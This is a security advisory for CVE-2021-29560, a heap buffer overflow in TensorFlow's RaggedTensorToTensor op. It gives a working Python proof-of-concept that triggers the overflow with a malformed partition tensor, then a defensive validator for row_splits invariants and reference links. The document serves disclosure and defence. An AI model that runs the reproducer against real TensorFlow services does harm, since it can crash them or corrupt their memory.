CVE-2021-29560: Heap buffer overflow in `RaggedTensorToTensor`
An attacker can cause a heap buffer overflow in `tf.raw_ops.RaggedTensorToTensor`:

```python
import tensorflow as tf

shape = tf.constant([10, 10], shape=[2], dtype=tf.int64)
values = tf.constant(0, shape=[1], dtype=tf.int64)
default_value = tf.constant(0, dtype=tf.int64)

l = [849, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
     0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
     0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
     0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
     0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
     0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
     0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
     0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
     0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
row = tf.constant(l, shape=[5, 43], dtype=tf.int64)
rows = [row]
types = ['ROW_SPLITS']

tf.raw_ops.RaggedTensorToTensor(
    shape=shape, values=values, default_value=default_value,
    row_partition_tensors=rows, row_partition_types=types)
```
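The partition tensor in the reproducer breaks every invariant that `tf.RaggedTensor` documents for `row_splits` (rank 1, first element 0, non-decreasing, last element equal to the number of values). The following added example, which is not part of the advisory and is not TensorFlow's fix, checks those invariants in plain Python before untrusted input reaches the raw op; the names `rank` and `row_splits_errors` are hypothetical, and the sample inputs are constructed.

```python
def rank(x):
    """Nesting depth of a list-like value (0 for a scalar)."""
    depth = 0
    while isinstance(x, (list, tuple)):
        depth += 1
        x = x[0] if x else 0
    return depth


def row_splits_errors(row_splits, nvals):
    """Return the reasons `row_splits` is not a valid partition of `nvals` values."""
    if rank(row_splits) != 1:
        return [f"row_splits must be rank 1, got rank {rank(row_splits)}"]
    if len(row_splits) == 0:
        return ["row_splits must not be empty"]
    errors = []
    if row_splits[0] != 0:
        errors.append(f"row_splits[0] must be 0, got {row_splits[0]}")
    if any(b < a for a, b in zip(row_splits, row_splits[1:])):
        errors.append("row_splits must be non-decreasing")
    if row_splits[-1] != nvals:
        errors.append(
            f"row_splits[-1] must equal the number of values ({nvals}), "
            f"got {row_splits[-1]}")
    return errors


# Constructed inputs. POC_ROW mirrors the advisory's partition tensor:
# 849 followed by zeros, reshaped to [5, 43]; the advisory's `values`
# tensor holds a single element, hence nvals=1.
POC_FLAT = [849] + [0] * 214
POC_ROW = [POC_FLAT[i * 43:(i + 1) * 43] for i in range(5)]
VALID = [0, 2, 2, 5]  # three rows (sizes 2, 0, 3) over five values

if __name__ == "__main__":
    cases = [("advisory shape [5, 43]", POC_ROW, 1),
             ("advisory data flattened", POC_FLAT, 1),
             ("well-formed", VALID, 5)]
    for name, splits, nvals in cases:
        print(name, "->", row_splits_errors(splits, nvals) or "ok")
```

A check like this belongs at the boundary where caller-supplied partition tensors enter the service; it complements updating to a TensorFlow release that contains the fix commit listed in the references.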
References
- github.com/advisories/GHSA-8gv3-57p6-g35r
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-488.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-686.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-197.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/a84358aa12f0b1518e606095ab9cfddbf597c121
- github.com/tensorflow/tensorflow/security/advisories/GHSA-8gv3-57p6-g35r
- nvd.nist.gov/vuln/detail/CVE-2021-29560